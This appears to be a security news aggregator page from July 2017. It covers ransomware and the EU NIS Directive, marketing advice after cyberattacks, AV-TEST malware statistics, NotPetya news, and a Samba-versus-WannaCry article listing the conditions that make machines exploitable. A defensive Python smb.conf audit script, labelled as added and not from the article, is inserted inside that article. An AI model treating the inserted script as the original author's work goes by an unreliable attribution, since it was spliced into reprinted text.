July 06, 2017 08:17 AM - The Hacker News - AlphaBay Market, one of the largest Dark Web marketplaces for drugs, guns, and other illegal goods, suddenly disappeared overnight without any explanation from its admins, leaving its customers who have paid large sums in panic. AlphaBay, also known as "the new Silk Road," has been shut down since Tuesday night. The site also came in the news at the beginning of this year when a hacker

Risks of hacking attacks: Ransomware – Cryptolocker and tutorials for Italian SMEs in the light of the Network and Information Security (NIS) Directive.

July 06, 2017 07:10 AM - Security Affairs -

As anticipated by Minister Pier Carlo Padoan, the Taormina G7 would have to face, inter alia, the overwhelming problem of Web security and the protection of sensitive data.

The issue is all the more urgent in the light of cyber attacks on the computer systems of key service providers in several EU Member States and in the UK, including the National Public Health Service (a public body) and Renault in France (a private body), which completely blocked both of the organizations mentioned, and not only them.

These attacks, in fact, were carried out on a large scale and involved hundreds of computer systems at the European level. Ransomware, the type of malware used by the hackers in this case, has already been used on several occasions and is spreading so rapidly that as early as 2017 it may become as serious a problem as DDoS (Distributed Denial of Service) attacks (source: David Gubiani, Check Point Security Engineering Manager).

Outside the Community level too, the UN Security Council has dealt with this issue in Resolution 2341/2017, which encourages United Nations Member States to coordinate with one another by exchanging their knowledge about attacks perpetrated via the Web.

On this point, it is interesting to note that Jurgen Stock (Head of Interpol) has complained of the structural disconnection that currently exists between United Nations Member States.

And as Professor Pierluigi Paganini, Chief Technologist of CyberSec Enterprise, said in his speech “From the Wannacry case to the NIS Directive, critical infrastructures are still too vulnerable”: “While in Europe there is a debate about the need to calibrate critical infrastructures and adopt security measures that will make them resilient to cyberattacks, such events demonstrate how vulnerable network infrastructure is, exposed even to small-scale threats.

Think of the potential large-scale impact of ransomware such as WannaCry that exploits a zero-day flaw, which is not known at the time of the attack and is therefore extremely dangerous.”

In the debate on Resolution 2341/2017, of particular interest is the finding that the key role in cyber attack prevention lies in cooperation between the public and private sectors; it was therefore hoped that a Memorandum of Understanding would be established between the Member States on sharing the information acquired.

It is evident ictu oculi, in both the NIS Directive at Community level and UN Security Council Resolution 2341/2017, that the call for “cooperation between the Member States” stresses how information exchange can prove crucial to limiting cyber attacks, providing effective prevention and, consequently, limiting the related harm to IT systems.

A particularly alarming aspect, however, is that in these attacks the hackers used ransomware called “WannaCry”, a virus that, like Cryptolocker, was created by scammers with high-level knowledge of computer programming.

Scammers can infiltrate a PC in a variety of ways, for example through an infected email attachment or through the browser, when a website is infected with this kind of malware. The word ransom refers to the payment demanded to remove the restriction and regain access to the PC (source: Avast), which amounts to real extortion carried out through the computer system. There is therefore a consequent risk that those who give in to the extortionists’ demands feed a funding channel for hidden criminal organizations and terrorist organizations (Europol sources).

However, as Gabriele Faggioli (lawyer, CEO of Partners4innovation) said, 2016, with the NIS Directive of the European Parliament and Council of July 6, will be remembered as the year that marks the course of the coming decades on the issue of computer security.

The future of this issue in Europe is essentially attributable to the rules of a large EU reform package, which has been in force, and in part already applicable, since this year: Regulation no. 679/2016, the General Data Protection Regulation (RGPD). This legislation, which entered into force on 24 May and applies from 24 May 2018, replaces Directive 95/46/EC. There is, moreover, Directive no. 1148/2016, the Network and Information Security Directive (NIS Directive), which entered into force on 8 August, laying down measures for a common high level of security of network and information systems across the Union.

The text of the Directive states that Member States shall ensure that public administrations and market operators take appropriate technical and organizational measures to manage the risks to the security of the networks and information systems that they control and use in their operations.

Given the state of the art, these measures must ensure a level of security appropriate to the actual level of risk involved.

In particular, measures should be taken to prevent and minimize the impact of incidents affecting their network and information systems on the essential services they provide, and therefore to ensure the continuity of the services that rely on those networks and information systems.

The Legislator has undertaken to ensure that the contents of these provisions are effective, work in practice, and last for at least a generation. The provisions are dense with technical and IT references and address the challenges imposed by new technologies in data protection and in system and network security.

As Antonello Salerno said, “The future of cybersecurity in Italy could be decided on two key aspects: the role of the PA as an example and a spur for the private sector, and the training of excellent skills that remain in the country.” Of course, adequate investment to protect critical infrastructures is also needed. To reach this goal, the implementation of the European Network and Information Security Directive will be important.

Although, from a formal point of view, the NIS Directive, adopted in July, has yet to be transposed (the transposition deadline is May 2018), Italy has already substantially aligned with many of the requirements of the new Community legislation and can now focus on the details that make the strategy more effective.

The cornerstones are those of the Decree of the President of the Council of Ministers of 24 January 2013, which contains a first model of cybersecurity governance and identifies the DSI or DIS (Department of Security Information) and the CISR (Interministerial Committee for the Security of the Republic) as the main coordinating bodies.

Under the NIS Directive, the essential service providers will need to be identified. The legislator could limit the obligation to notify attacks to large national players, leaving out the majority of the Italian business fabric (mainly composed of SMEs), or, as may be desirable, extend this obligation to relatively small actors, such as many municipal or local companies, which nonetheless serve large user bases and whose contribution on a national scale could be extremely significant.

The specific methods of allocating these resources will depend on the effectiveness of Italian action on computer security. “The opportunity,” emphasizes Andrea Rigoni (cybersecurity expert and partner of Intellium, a strategic consultancy for NATO, governments and large infrastructures), “is that with the adoption of the NIS directive we get back on track with the plan and decide to allocate funding for network security more clearly and promptly.”

Particularly interesting will be the role of the Public Administration, which, as has happened on other occasions in the past, starting with electronic invoicing, can drive a changeover in the private sector through compliance mechanisms. On the one hand, the public sector has to make its own infrastructures and management systems compliant with international standards that the Government is required to identify and detail; on the other hand, it may demand the same security standards of companies interested in working with the Public Administration, thus triggering a virtuous circle that involves the private sector through certification of the PA supply chain.

The risk for companies operating in any economic sector is high, as evidenced by the outcome of a study that Prof. Pierluigi Paganini calls “surprising”: only 3 threats have been designed with the intent of striking critical industrial systems and infrastructures, namely Stuxnet, Havex, and BlackEnergy2. That data, Paganini continues, “confirms that industrial systems today continue to be most exposed to generic threats, an alarming finding if we consider that an attack designed to hit these systems could have disastrous effects.

Stuxnet first, and then the latest attacks in Ukraine with the BlackEnergy malware, have demonstrated the effectiveness of malware in an offensive against an industrial system in a critical infrastructure.”

Beyond what has just been reported, additional business risks derive from the use of devices such as smartphones and tablets. Many companies, both public and private, provide such devices to their employees. With a 394% increase in smartphone use and a 1700% increase in tablet use over the past four years, it is no wonder that mobile attacks are steadily increasing. According to the Check Point Security Report 2016, one employee in five will be the cause of a breach of business data via mobile malware or malicious Wi-Fi, both highly effective attack vectors against mobile devices.

As this trend steadily grows, Check Point points out that mobile-related business breaches are becoming an increasingly significant problem for company security, since these devices are particularly vulnerable, not least because the antivirus they use is often not updated frequently.

Recent attacks involving journalists’ phones show that such attack techniques are “in the wild” and that we should increasingly expect to see criminal gangs using them. Mobile security remains a challenge for businesses, a push-pull between productivity, privacy and protection.

In 2017, organizations should take into account the spread of cyber attacks through the “Industrial Internet of Things”: not only through corporate smartphones and tablets, but also, for example, through printers or other types of devices.

Convergence between IT and Operational Technology (OT) is making both environments more vulnerable; it will therefore be necessary to extend physical security controls to the logical space and implement threat prevention solutions in both IT and OT environments. Critical infrastructures, including nuclear power plants, electricity and telecommunications networks, remain highly vulnerable to cyber attacks. Almost all infrastructures were designed and built before the threat of cyber attacks existed, and for this reason even the simplest computer security principles were in most cases not taken into account in their design.

In this regard, it is interesting and also worrying what emerged in the quoted work of Prof. Pierluigi Paganini, which, drawing on research by the US ICS-CERT, states that: “… the energy sector is one of the most sought after, as confirmed by the many attacks that have been observed over recent months by criminal groups and nation-state actors. According to a recent analysis released by IBM Managed Security Services, the number of attacks against industrial systems has increased by 110% compared to last year. IBM experts observed a significant increase in brute-force attacks against SCADA systems. … The US leads the rankings of the five nations most affected by the attacks, which is not surprising if we consider the large number of ICS systems in the United States.”

It was only at the beginning of 2016 that the first intentional blackout caused by a computer attack occurred.

Critical Infrastructure Security Officers must, therefore, be prepared for their networks and systems to be systematically attacked by different actors: other States, terrorists and organized crime.

Check Point’s Security Report 2016 revealed that the volume of unknown malware attacking organizations is nearly 10,000, with about 12 million new malware variants identified each month.

The Security Report states: “These technologies are in fact part of our business and cybercriminals have consequently innovated their hacking techniques.”

“Hackers have become smarter when it comes to malware and ransomware, releasing new variations every minute.”

“The era of signature-based antivirus to detect malware is far away.”

“With these predictions, companies can develop their IT security plans to keep them one step ahead of emerging threats by preventing attacks before they can cause damage.”

To ensure convergent implementation of Article 14, EU Member States encourage the use of standards and/or technical specifications for the security of network and information systems.

Precisely in order to counter the risks of attacks on computer systems, as stressed above, 2016 will be remembered not only for the NIS Directive but also for privacy legislation.

Member States’ legislation designates competent authorities both for the protection of sensitive data and for the Computer Security Incident Response Team (CSIRT); since many incidents compromise personal data, the NIS Directive also provides that the competent authority should operate in close cooperation with the data protection authorities in cases of incidents involving personal data breaches.

However, the two regimes must not be confused, as they regulate the activities of distinct subjects: the NIS Directive applies only to providers of essential services and Internet service providers, while the privacy and data protection regulations also apply to individuals.

The rules in question may nonetheless overlap where a computer incident also involves a personal data breach. In this case, the affected parties will have to report under both instruments, i.e. both the incident notification required by the NIS Directive and the personal data breach notification required by the RGPD.

The hope is that, at this juncture and in the process of transposing both Directives into our legal order, the Authorities responsible for monitoring and managing cyberattacks and for protecting personal data will draw up guidelines to help businesses cope with security incidents, so as to ensure compliance with both regulations.

Given that the NIS Directive applies only to “macro categories”, i.e. operators of essential services (energy, transport, banking, health, etc.), while Regulation no. 679/2016 applies to all companies, it should be noted that the business fabric on Italian territory is predominantly made up of SMEs, which as such cannot benefit from the protection provided by the NIS Directive. It would therefore be desirable, in addition to a convergence of the rules just cited, to create within the various trade associations (such as Confindustria, Confagricoltori, Confartigianato) structures capable of receiving reports of any incidents that have affected their members and then, in turn, communicating them to the CSIRT.

The entity set up within each trade association should essentially mirror the structure of the CSIRTs as set out in the NIS Directive, taking on a dual function: first, protecting small and medium-sized enterprises from potential cyber attacks that could harm or even block production by compromising the information and sensitive data held on the companies’ own servers; and second, assessing the reliability of member companies, thereby developing a sort of “computer reliability rating” covering both the prevention of computer incidents and the assurance of a high level of protection of sensitive data.

Any user of the services produced by the entities concerned should be able to know whether the company they are dealing with is substantially reliable from an IT point of view and how it holds sensitive data on its own servers. Think, for example, of a clinic and a patient suffering from a disease which, if disclosed, could severely damage the patient’s reputation. Or of a large company that would like to collaborate with another company in its supply chain: it is clearly useful to be aware of the reliability of the computer systems used.

To ensure the full operation of the scheme described, the “mini CSIRT” or “category CSIRT” within each trade association would need to be linked to a national CSIRT, which in turn is connected to the CSIRT network at Community level.

Furthermore, in a top-down view, a category CSIRT that becomes aware of an incident affecting one of its members must report it not only to the national CSIRT but also to the other members of the association, while avoiding, where possible, disclosing the name of the affected member for reasons of company reputation.

Companies will also have to set up a biennial plan to prevent computer attacks and protect sensitive data contained in their servers.

Consequently, every two years the category CSIRT will draw up a list of member companies with a rating of their reliability based on the level of prevention of computer incidents they have reached. This will greatly contribute to protecting the members of the association, improving prevention against cyber attacks, and supporting action in the event of an attack suffered.

Such a system, which moreover reflects a duty of cooperation enshrined at both global and Community level, can guarantee public companies, private individuals and users of the services produced ever more secure computer systems and the capability to deal with hacker attacks, without abandoning victims and their users to their fate with no specific points of reference.

I conclude by endorsing the conclusions of Prof. Pierluigi Paganini in his talk “From the Wannacry case to the NIS Directive, critical infrastructures are still too vulnerable”, in which he expressly stated: “… recalling that the security of our infrastructures also depends on the posture of citizens. We need to learn about computer threats and how to defend ourselves from them. We are nodes of a global network with which we exchange a huge amount of information; filtering or configuration errors in the systems we use every day could lead to risk situations for the entire community.”

WannaCrypt ransomware

And I would add that, as with combating offences committed by minors online, education is the most important aspect of prevention. We must accept once and for all that no player in the world, large or small (natural and/or legal persons), can feel immune to attacks, and that all must therefore protect themselves in cyberspace while never underestimating the risk and its consequences. We must also learn that what happens in the virtual world has ever more serious repercussions on the real world and on the fate of the cyber attack victim.

Author: Attorney Marco Mariscoli

Pierluigi Paganini 

(Security Affairs – ransomware , cybercrime)

The post Risks of hacking attacks: Ransomware – Cryptolocker and tutorials for Italian SMEs in the light of the Network and Information Security (NIS) Directive. appeared first on Security Affairs.

5 Things Marketers Should Do After the Next Cyberattack

July 06, 2017 07:00 AM - Neustar -

Note: This article was originally published in Advertising Age on June 29, 2017.

The week after Cannes typically involves recovering from too much rosé, following up on some great meetings, and for a lucky few, perhaps an extended holiday. A worldwide cyberattack was not part of the agenda for folks across adland. It's a sobering reality that most brands and agencies are not prepared for.

This is an industry wake-up call.

Cybersecurity is a $445 billion problem, and some predict that figure could rise to $6 trillion by 2021. CEOs and boards are rightly worried about the risks to their business: A March 2017 report by executive search firm Spencer Stuart found that 39% of board directors said they discuss cybersecurity at every meeting and that 40% of respondents reported their board has at least one director with cyber expertise. An additional 7% are in the process of recruiting one.

So what's a CMO to do?

In its May 2017 Cyber Insights Research Report, Neustar found that 40% of companies discovered a distributed denial-of-service (DDoS) attack through their very own customers. No one in marketing should be caught flat-footed when a cyberattack happens. For starters, marketers need to understand what type of attacker they're dealing with (see below), then proceed accordingly:

1. Identify all key cybersecurity stakeholders across the company

Everyone in marketing should know who the key players are internally at the company. Security should be everyone's job. You may have some or all of the following key roles at your company, so get to know these execs and their key lieutenants and what they do: Chief Information Security Officer (CISO), Chief Data Officer (CDO), Chief Technology Officer (CTO), Chief Information Officer (CIO), Chief Risk Officer (CRO).

2. Understand your brand's specific risks

Map out all of the customer touchpoints you have and list all of the key technologies that underpin each touchpoint. For example, a retailer needs to think not only about online and offline touchpoints, but call centers, point-of-sale systems, CRM databases, mobile applications, supply chain distribution, email and much, much more. Those are just the technologies that interface directly with customer touchpoints. You will also need to map out second-derivative technologies. One retailer identified that its data breach could be traced to a third-party contractor who had been compromised while holding credentials to access the company's computer network.

3. What's your role in business continuity management?

The companies that are most prepared for a cyberattack have a well-defined Business Continuity Plan, which should provide a roadmap for responding to a range of potential emergencies relating to the people, the customers, the partners, the data and the facilities that comprise business assets. How is marketing involved in your company's BCP? Do you even know what your company's BCP is? Do you have messages and communications templates ready for when there is an issue?

4. Ask questions … Lots of them

While many marketers are learning about customer data and privacy matters, this is the right time to ask more security-related questions so you can learn more. When it comes to questions, here are some to start with.

  • What was our most significant cybersecurity incident? What was our response?
  • What was our most significant near miss? How was it discovered?
  • How can marketing help with our cybersecurity initiatives?
  • What are considered our tier 1, 2 and 3 priorities during a cyberattack?
  • How is the performance of our security team evaluated?
  • Do we have relationships with law enforcement, such as the FBI and Interpol?
  • How are we thinking about security with our supply chain partners, vendors and other partners?
  • What is our plan to communicate internally and externally to all key stakeholders?
  • Bookmark key websites like U.S. Homeland Security and cybersecurity thought leader Brian Krebs so you get up-to-date information.

5. Do what you do best: Market

Marketers can help their security executives with internal security marketing campaigns. Partner with these leaders to offer training, webinars, lunch-and-learns, and general security awareness to your employees. Security is a shared responsibility and we are only as strong as our weakest link. Help to build a security-aware culture that identifies and prevents possible attacks.

TAXONOMY OF AN ATTACKER

Before responding to a cybersecurity attack, companies need to know what type of attacker they're dealing with. There are 6 main species:

THE THIEF

This is probably the most well-known type of cyberattack, which usually involves stealing some type of login credentials or hacking systems to steal sensitive information such as financial data (e.g., credit card or bank details) or medical data.

Fun fact: Cybercriminals attack the healthcare industry more than any other sector, and your medical information is worth 10 times more than your credit card number on the black market.

THE KIDNAPPER

Typically referred to as “ransomware”, this is digital extortion. A type of malicious software (“malware”) is used to block access to the victim's files or applications and makes them useless. The victim must pay a ransom to gain access or recover the files. This can be a targeted attack or a random attack put out into the wild done by individual hackers or organized crime. This week's Petya is the latest in an alarming rise in ransomware attacks.

Fun fact: Global ransomware damage costs are predicted to exceed $5 billion in 2017. That's up from $325 million in 2015 — a 1,500% increase in two years, and expected to worsen.

THE DISRUPTER

These are attacks that are global in nature, wide-ranging and do not necessarily discriminate among governments, companies or individuals. The goal is to disrupt, sometimes just to show that you can. Taking down a website or even discovering and exploiting new vulnerabilities is practically sport for hackers and it earns serious bragging rights.

Fun fact: The October 2016 Mirai cyberattack against Domain Name System (DNS) provider Dyn (now owned by Oracle) took down high-profile sites ranging from Pinterest and Twitter to Netflix and Walgreens. It was one of the largest DDoS attacks ever. Mirai malware infected devices to form a robot network or "botnet" and coordinated the bombarding of servers with Internet traffic until the website collapsed under the strain. Mirai was the first botnet made up of "Internet of Things" (IoT) devices such as DVRs, webcams and other connected devices. So yes, your DVR might be working for the enemy.

THE ACTIVIST

Whether it’s protesting a belief, a cause, or an individual, these are the “hacktivists” that are making a statement. It can be political in nature or values-driven, ranging from organizations to individual hackers making their voice heard.

Fun fact: While WikiLeaks dominated the headlines throughout the 2016 election cycle, Anonymous is perhaps the most active and prominent group over the past decade. Anonymous rose to prominence in 2008 when they unleashed a massive DDoS attack against the Church of Scientology.

THE STATE

What used to be something you'd see in the movies is now real-life. Whether it’s government espionage or cyberwarfare, politically motivated attacks range from spying to stealing intelligence, to sabotaging plots to actual warfare.

Fun fact: Discovered in 2010, the Stuxnet computer worm was responsible for causing serious damage to Iran's nuclear program, ruining approximately one-fifth of their nuclear centrifuges.

THE TERRORIST

The scariest of them all. From rogue hackers to terrorist organizations, this is where the connected world gets truly dangerous. In 2017, there are more machines behind IP addresses than humans. As IoT becomes pervasive, the threat of taking out mission-critical infrastructure, from power grids to telecommunications networks, is increasingly real. This can affect anything and everything from connected cars to hospitals to airplanes.

Fun fact: This May, 16 hospitals across the United Kingdom were unable to access basic medical records due to the WannaCry ransomware attack. Just imagine if, instead of ransoming data, the cyberattackers threatened to shut down the hospital's power.

The Impact of a Security Breach 2017

July 06, 2017 04:00 AM - Dark Reading - Despite the escalation of cybersecurity staffing and technology, enterprises continue to suffer data breaches and compromises at an alarming rate. How do these breaches occur? How are enterprises responding, and what is the impact of these compromises on the business? This report offers new data on the frequency of data breaches, the losses they cause, and the steps that organizations are taking to prevent them in the future.

[Strategic Security Report] Assessing Cybersecurity Risk

July 06, 2017 04:00 AM - Dark Reading - As cyber attackers become more sophisticated and enterprise defenses become more complex, many enterprises are faced with a complicated question: what is the risk of an IT security breach? This report delivers insight on how today's enterprises evaluate the risks they face. This report also offers a look at security professionals' concerns about a wide variety of threats, including cloud security, mobile security, and the Internet of Things.

Is Your Company Security Strategy Obsolete?

July 06, 2017 03:02 AM - TripWire - The State of Security -

The DDoS attacks of 2016 and the WannaCry ransomware that recently affected thousands of computer systems have compelled businesses to look into their security mechanisms and identify the pitfalls that might make them a victim of cyber threats in the future. Verizon had already highlighted the intensity of upcoming challenges in their annual 2016 Data […]… Read More

The post Is Your Company Security Strategy Obsolete? appeared first on The State of Security.

Why Small Businesses Don’t Care About Cyber Security

July 06, 2017 03:00 AM - TripWire - The State of Security -

With millions of small businesses out there, why don’t they care about cyber security? You may be reading this and own a small business or know someone that does. Think to yourself: why would small businesses not care about cyber security? You may find that it is not a problem of caring but a problem […]… Read More

The post Why Small Businesses Don’t Care About Cyber Security appeared first on The State of Security.

Bitcoin Funds Stolen from Bithumb Exchange

July 06, 2017 12:25 AM - Dark Reading - Exchange employee's home PC the initial attack vector.

July 05, 2017

Sabre Update on Cybersecurity Incident

July 05, 2017 09:36 PM - Office of Inadequate Security - SOUTHLAKE, Texas, July 5, 2017 /PRNewswire/ — Sabre Corporation (NASDAQ: SABR) issued the following statement regarding a cybersecurity incident first disclosed on May 2, 2017: Since June 6, Sabre has notified and been working with certain customers and partners that use or interact with Sabre Hospitality Solutions’ (SHS) SynXis Central Reservations system (SHS reservation system) about our [...]

While investigating one ransomware attack, Walnut Place hit with second attack

July 05, 2017 09:30 PM - Office of Inadequate Security - On May 12, I posted a press release from Walnut Place about a ransomware attack that had occurred in January. Their press release did not disclose that they had become aware of a second ransomware attack on May 6. A new press release, dated today, does: On March 13, 2017, Walnut Place leadership was informed [...]

Two charged with running hacking service used in ‘major computer intrusions’ of U.S. businesses

July 05, 2017 09:23 PM - Office of Inadequate Security - Rachel Weiner reports: Two men from Latvia ran a malware service that has been in operation for more than a decade and used in major attacks against U.S. businesses, according to an indictment unsealed Wednesday in federal court in Alexandria, Va. The men, along with an alleged co-conspirator in Virginia, designed a buffet of hacking [...]

23% off FitBit Aria WiFi Smart Scale - Deal Alert

July 05, 2017 09:05 PM - CSO Online - Track and wirelessly sync your weight, % body fat, and Body Mass Index (BMI) to Fitbit.com. This 23% off deal saves you $30 on its regular list price.

AV-TEST: The number of malware decreases, but their complexity increases

July 05, 2017 08:31 PM - Security Affairs -

According to the AV-TEST Security Report 2016/2017 published by the independent anti-virus testing outfit AV-TEST, the number of malware samples detected in 2016 decreased compared to 2015, but they have been more sophisticated.

The recent NotPetya and WannaCry ransomware-based massive attacks, IoT malware like Mirai and banking Trojans implement new sophisticated techniques to avoid detection and to rapidly spread.

AV-TEST spotted roughly 127.5 million malware samples in 2016, whereas the number of samples discovered in 2015 was 144 million (about 14% more).

AV-TEST report 2016 - 2017

The research institute observed roughly 350,000 new malware samples each day, which corresponds to about four new samples per second.

Less than one percent of the total share of Windows malware is represented by Ransomware, but the damage caused by this threat is severe.

“Comprising not even 1% of the overall share of malware for Windows, the blackmail Trojans appear at first glance to be a marginal phenomenon. The fact that this type of assessment is incorrect can be explained via the mode of action and damage created by this class of Trojans. ” states AV-TEST.

“A level of distribution comparable to traditional viruses is not required to reap the greatest possible profit. Ransomware involves ‘high-tech malware’, which seeks its victims above all in a targeted business environment. For instance, emails infected with ransomware are sent out almost exclusively on weekdays.” 

According to the researchers, the number of ransomware attacks peaked in Q1 2017.

AV-TEST reported a significant increase in the number of Mac OS samples (+370%) compared to 2015. The majority of the malware consisted of Trojans; more than 4,000 new samples were already identified in Q1 2017.

“Compared to the previous year, the malware sector for macOS is experiencing 370 percent growth. However, it is also important to keep an eye on the overall number of malware programs: Whereas in 2015 there were still a moderate 819 different malware threats targeting macOS, Apple users in 2016 already had to protect their devices from 3033 malware samples.” states the report.

The report confirms that the number of Android malware samples doubled in 2016 to over 4 million; in June alone AV-TEST identified nearly 650,000 new malware samples.

Take a look at the AV-TEST Security Report 2016/2017!

Pierluigi Paganini

(Security Affairs – AV-TEST, malware)

The post AV-TEST: The number of malware decreases, but their complexity increases appeared first on Security Affairs.

New FTC Policy Would Shield Lawyers, Staff From Personal Liability

July 05, 2017 07:58 PM - Office of Inadequate Security - C. Ryan Barber reports: The Federal Trade Commission on Wednesday adopted an indemnity policy that will shield lawyers and other staff from any personal liability for enforcement actions that draw a lawsuit and expose them to a monetary judgment. The policy, adopted without public comment, will allow the agency to cover the cost of any [...]

Updates to NotPetya Lead to Server Seizure at Ukrainian Software Firm

July 05, 2017 07:55 PM - Dark Reading - Police seized servers from Ukraine's Intellect Service as the country scrambles to control a cyberattack allegedly conducted by advanced hackers.

[Video] Ukrainian Police Seize Servers of Software Firm Linked to NotPetya Cyberattack

July 05, 2017 07:40 PM - The Hacker News - Ukrainian National Police has released a video showing officers raiding the company that makes the M.E.Doc accounting software, whose systems have been linked to the outbreak of Petya (NotPetya) ransomware that recently infected the computers of several major companies worldwide. On 4th July, masked police officers from the Ukrainian anti-cybercrime unit — carrying shotguns and assault rifles — raided the

How Cisco is establishing itself as a cybersecurity leader

July 05, 2017 07:33 PM - CSO Online -

Welcome to the new home of my blog here at CSO! I spent a few days at CiscoLive last week, Cisco’s annual user conference, in steamy Las Vegas. As a cybersecurity professional, I really filtered out a lot of other content to focus on all-things infosec. Here are a few of my observations:

1. As the fastest growing business unit at Cisco, cybersecurity certainly received plenty of top billing. CEO Chuck Robbins highlighted security in his keynote and even chatted cybersec with Apple CEO Tim Cook during his presentation. In fact, Apple and Cisco announced a partnership to secure iOS devices moving forward.

2. If your image of Cisco is firewalls and IDS/IPS, you’re kind of stuck in a 2005 mindset. Cisco has a wide assortment of products for cloud security, endpoint security, security analytics, etc. Cisco is even investing heavily in cybersecurity services to help its customers impacted by the cybersecurity skills shortage.

To read this article in full or to leave a comment, please click here

Threat Actors Target Chinese Language News Sites

July 05, 2017 06:56 PM - Threatpost - Citizen Lab investigates the targeting of Chinese language news websites in a phishing attack that leveraged the NetWire remote access Trojan.

How Does Samba Compare to WannaCry?

July 05, 2017 06:29 PM - Infosec Island -

Many reports are drawing comparisons between the Samba vulnerability and WannaCry, with some even dubbing it SambaCry. There’s no denying that the Samba vulnerability is serious. It also shares some similarities with WannaCry: it exploits a vulnerability in a service that utilizes Windows' SMB protocol, and, like WannaCry, is 'wormable' – meaning each infected machine could potentially infect other machines in its network, significantly increasing the spread of the malware. But it doesn’t pose the same widespread risk as WannaCry.

To start, the number of potential targets of the Samba vulnerability is significantly smaller. Of the 2.3 million internet-exposed machines worldwide, the Samba vulnerability could only potentially impact a fraction – 60,000 to be exact. While, at first glance, it would seem like there are millions of machines running Samba, from routers and network printers to your home NAS, several factors must align for a machine to be exploited by this vulnerability:

  1. The machine needs to have TCP port 445 open and directly connected to the internet – this brings the number of potential targets down to 2.3 million machines worldwide;
  2. Guest login without password needs to be enabled – down to 980 thousand machines worldwide;
  3. The server is indeed running the vulnerable SAMBA version – down to 120 thousand machines worldwide;
  4. A writeable network share needs to exist on the system – down to about 70 thousand machines worldwide;
  5. And, finally, Samba inter-process communication needs to be enabled – down to about 60 thousand machines worldwide.

Although the risk is not as dire as WannaCry, organizations should always be vigilant to protect against any potential threats and should not ignore the possibility of an attacker exploiting Samba. The following “Three P’s” will help mitigate the potential threat posed by the Samba vulnerability to your business:

  • Patch, Patch & Patch: If a Samba server is enabled on a targeted device, or if your business is running an older Samba protocol version, keep that device updated with recent patches. File sharing is a business need, and patches will ensure that your system remains secure.
  • Password Protect: Often, guest logins do not require a password; however, all systems should be password protected to deflect attacks. Without a password, your system remains vulnerable.
  • Port it Shut: Firewalls are important, and ensuring that the specific Samba 445 Port is closed will eliminate the threat of external exploitation.
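As an added example (not from the article or the Samba project), the following Python audit checks an smb.conf against the configuration-side conditions in the list above and the "Password Protect" advice: guest access (condition 2), a writable share (condition 4) and named-pipe IPC (condition 5). It assumes the smb.conf parameters `guest ok`/`public`, `guest only`, `map to guest`, `read only`/`writable` and `nt pipe support`; the version check (condition 3) and port exposure (condition 1) are left to the vendor advisory and the firewall.

```python
YES = {"yes", "true", "1"}
NO = {"no", "false", "0"}


def parse_smb_conf(text):
    """Minimal smb.conf parser returning {section: {key: value}}.
    Samba treats parameter names case-insensitively and ignores internal
    whitespace, so 'Guest OK' and 'guestok' normalise to the same key."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":      # comment or blank line
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif current is not None and "=" in line:
            key, _, value = line.partition("=")
            sections[current]["".join(key.split()).lower()] = value.strip()
    return sections


def share_is_writable(share, global_):
    """Condition 4: 'writable'/'writeable' = yes or 'read only' = no.
    A share-level setting wins over [global], which Samba uses as the
    default for share parameters; a share is read only if nothing is set."""
    for scope in (share, global_):
        if "writable" in scope or "writeable" in scope:
            return scope.get("writable", scope.get("writeable")).lower() in YES
        if "readonly" in scope:
            return scope["readonly"].lower() in NO
    return False


def share_allows_guest(share, global_):
    """Condition 2: 'guest ok' (synonym 'public') or 'guest only' admits
    the guest account without a password; all three default to no."""
    for scope in (share, global_):
        present = [scope[k].lower() for k in ("guestok", "public", "guestonly") if k in scope]
        if present:
            return any(v in YES for v in present)
    return False


def audit_smb_conf(text):
    """Return (level, message) findings. HIGH means a guest-reachable,
    writable share exists while named-pipe IPC is still enabled, i.e.
    every configuration-side condition holds at once."""
    conf = parse_smb_conf(text)
    global_ = conf.get("global", {})
    findings = []
    # Condition 5: 'nt pipe support = no' was the documented workaround;
    # the parameter defaults to yes when absent.
    pipes_on = global_.get("ntpipesupport", "yes").lower() in YES
    if global_.get("maptoguest", "never").lower() != "never":
        findings.append(("INFO", "global: 'map to guest' turns failed logins into guest sessions"))
    for name, share in conf.items():
        if name == "global":
            continue
        writable = share_is_writable(share, global_)
        guest = share_allows_guest(share, global_)
        if guest and writable and pipes_on:
            findings.append(("HIGH", f"share [{name}]: guest-accessible and writable, named-pipe IPC enabled"))
        elif guest and writable:
            findings.append(("MEDIUM", f"share [{name}]: guest-accessible and writable (mitigated by nt pipe support = no)"))
        elif writable:
            findings.append(("INFO", f"share [{name}]: writable, authenticated users only"))
    return findings


def is_exposed(text):
    """True when the audit produced at least one HIGH finding."""
    return any(level == "HIGH" for level, _ in audit_smb_conf(text))


# Constructed sample configurations for this example (not from any real host).
EXPOSED_CONF = """
[global]
   map to guest = Bad User
[public]
   path = /srv/samba/public
   guest ok = yes
   read only = no
[docs]
   writable = yes
"""

HARDENED_CONF = """
[global]
   map to guest = Never
   nt pipe support = no
[public]
   guest ok = no
   read only = yes
[docs]
   writable = yes
   valid users = @staff
"""
```

Running `audit_smb_conf(EXPOSED_CONF)` flags the `[public]` share as HIGH, while the hardened configuration yields only an informational note about the authenticated `[docs]` share.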

With new vulnerabilities constantly being brought to light, there’s considerable fear of security risks, and confusion about what these risks mean to organizations. In the case of the Samba vulnerability, it’s important to remember that this is just a vulnerability. There is no evidence to suggest that malware exploiting the Samba vulnerability would be ransomware, nor would this likely be a massive attack.

But, organizations should always be aware of potential threats. They need to understand the business and technical implications of their systems’ vulnerabilities, and select the best set of controls to prevent attackers from using exploits.

About the author: Rotem Iram is the Founder and CEO of stealth cyber insurance company CyberJack. With nearly two decades of security and engineering experience, Rotem previously served as a Managing Director and COO in the Cyber Security practice of K2 Intelligence, a leading global risk management firm, focusing on cyber intelligence, cyber defense strategy, and incident response.

Copyright 2010 Respective Author at Infosec Island

Security executives on the move and in the news

July 05, 2017 06:00 PM - CSO Online -

The upper ranks of corporate security are seeing a high rate of change as companies try to adapt to the evolving threat landscape. Many companies are hiring a chief security officer (CSO) or chief information security officer (CISO) for the first time to support a deeper commitment to information security.

CSO’s Movers & Shakers is where you can keep up with new senior level security executive appointments and perhaps gain a little insight into hiring trends. If you have an announcement of your own that you would like us to include here, contact Michael Nadeau, senior editor.  

June 29, 2017: Yassir Abousselham named CSO for identity solution provider Okta

